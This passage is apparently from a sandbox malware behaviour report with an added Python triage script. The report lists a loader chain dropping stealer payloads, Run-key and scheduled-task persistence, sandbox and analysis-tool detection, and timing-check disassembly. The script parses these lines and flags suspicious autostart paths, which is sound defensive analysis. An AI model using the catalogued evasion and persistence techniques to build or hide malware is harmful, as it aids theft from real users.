Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000285001\2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\1000015002\b74664dd7e.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000321001\2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
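A triage script for behaviour lines like the ones above, added here as an example and not part of the original report or of the Joe Sandbox product: it parses "Source: <image> <event>: <detail>" lines, collapses verbatim repeats with a count, lists the autostart artefacts (the Tasks job and the Run values) and the analysis-tool window classes the loader searches for (FilemonClass, RegmonClass and PROCMON_WINDOW_CLASS are the window classes of Sysinternals Filemon, Regmon and Process Monitor), and applies a suspicious-folder check in the spirit of the Sigma rule named in the signature list. The report shows only the Run value names, not their data, so the paths fed to that check are assumptions for illustration: two are drop locations seen elsewhere in this report, one is a constructed benign entry. A value named splwow64.exe borrows the name of a genuine Windows print-spooler binary, which is why the value data, not the name, is what to check.

```python
"""Triage helper for the behaviour lines in a Joe Sandbox-style report.

Added example, not part of the original report. Parses 'Source: <image> <event>: <detail>'
lines into records, collapses verbatim repeats, and extracts autostart artefacts and
analysis-tool window probes. Run-value data below is assumed (not shown in the report).
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample: a subset of lines from the section above, verbatim.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass",
    r"Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior",
]

EVENT_NAMES = ("Window searched", "File created", "Registry value created or modified",
               "Process information set", "File opened", "WMI Queries",
               "Sandbox detection routine", "Code function", "RDTSC instruction interceptor")
# Image path is non-greedy and anchored by the known event name, so paths with spaces still parse;
# the trailing 'Jump to behavior' link text is dropped.
LINE_RE = re.compile(r"^Source: (?P<src>.+?) (?P<event>" + "|".join(map(re.escape, EVENT_NAMES)) +
                     r"): (?P<detail>.*?)(?: Jump to behavior)?$")
RUN_KEY_RE = re.compile(r"^(?P<key>HKEY_[A-Z_]+\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?) (?P<value>.+)$", re.I)


@dataclass(frozen=True)
class Record:
    source: str
    event: str
    detail: str


def parse(lines):
    """Turn report lines into Records; lines that are not behaviour lines are skipped."""
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            out.append(Record(m["src"], m["event"], m["detail"]))
    return out


def collapse(records):
    """Verbatim repeats become one (record, count) pair, first-seen order preserved."""
    return list(Counter(records).items())


def analysis_tool_probes(records):
    """Window classes each process searched for (FindWindow-style analysis-tool detection)."""
    probes = {}
    for r in records:
        if r.event == "Window searched" and r.detail.startswith("window name: "):
            probes.setdefault(r.source, set()).add(r.detail[len("window name: "):])
    return probes


def autostart_entries(records):
    """(kind, creating process, location, value name) for Run values and Tasks jobs."""
    entries = set()
    for r in records:
        if r.event == "Registry value created or modified":
            m = RUN_KEY_RE.match(r.detail)
            if m:
                entries.add(("run", r.source, m["key"], m["value"]))
        elif r.event == "File created" and r.detail.lower().startswith("c:\\windows\\tasks\\") \
                and r.detail.lower().endswith(".job"):
            entries.add(("job", r.source, r.detail, ""))
    return entries


# Suspicious-folder check in the spirit of the Sigma rule named in the report header.
SUSPICIOUS_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\",
                      "%appdata%", "%localappdata%", "%temp%", "%tmp%", "%public%")
PROFILE_SUBDIR_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(?P<first>[^\\]+)\\", re.I)
STANDARD_PROFILE_DIRS = {"desktop", "documents", "downloads", "pictures", "music", "videos"}


def is_suspicious_autostart_path(command):
    """True when Run value data points into a user-writable or non-standard profile folder."""
    p = command.strip().strip('"').lower()
    if any(marker in p for marker in SUSPICIOUS_MARKERS):
        return True
    m = PROFILE_SUBDIR_RE.match(p)
    return bool(m) and m["first"] not in STANDARD_PROFILE_DIRS


# Assumed value data for demonstration only; the report lists value names, not data.
ASSUMED_RUN_DATA = {
    "3ec4738210.exe": r"C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe",
    "b74664dd7e.exe": r"C:\Users\user\1000015002\b74664dd7e.exe",
    "Example Updater": r"C:\Program Files\Example\updater.exe",  # benign contrast, constructed
}

if __name__ == "__main__":
    recs = parse(SAMPLE_LINES)
    for rec, n in collapse(recs):
        print(f"{n:2d}x {rec.event}: {rec.detail}")
    print("tool-window probes:", analysis_tool_probes(recs))
    for entry in sorted(autostart_entries(recs)):
        print("autostart:", entry)
    for name, data in ASSUMED_RUN_DATA.items():
        print(f"{name}: {'SUSPICIOUS' if is_suspicious_autostart_path(data) else 'ok'} -> {data}")
```

Feed it the whole behaviour section of a report rather than the sample list to get the complete autostart inventory; on a live host the same `is_suspicious_autostart_path` check applies to the value data read from HKCU and HKLM Run keys.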
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 17_2_00E0F98E
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 17_2_00E81C41
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX (7 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (13 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (149 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX (7 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX (14 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX (86 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_CURRENT_USER\Software\Wine (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (3 occurrences)
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_CURRENT_USER\Software\Wine (3 occurrences)
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (4 occurrences)
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F1D5 second address: E0F1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F1D9 second address: E0F1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007F4B90BE6226h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F1FB second address: E0EACF instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D698h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F4B9132D69Bh 0x00000012 push dword ptr [ebp+122D0D41h] 0x00000018 jns 00007F4B9132D6A1h 0x0000001e jmp 00007F4B9132D69Bh 0x00000023 call dword ptr [ebp+122D2E7Eh] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D346Ah], ebx 0x00000030 xor eax, eax 0x00000032 jo 00007F4B9132D69Ch 0x00000038 pushad 0x00000039 mov ecx, edi 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 sub dword ptr [ebp+122D346Ah], ebx 0x00000048 mov dword ptr [ebp+122D2998h], eax 0x0000004e sub dword ptr [ebp+122D346Ah], edx 0x00000054 mov esi, 0000003Ch 0x00000059 cld 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D183Ch], edi 0x00000064 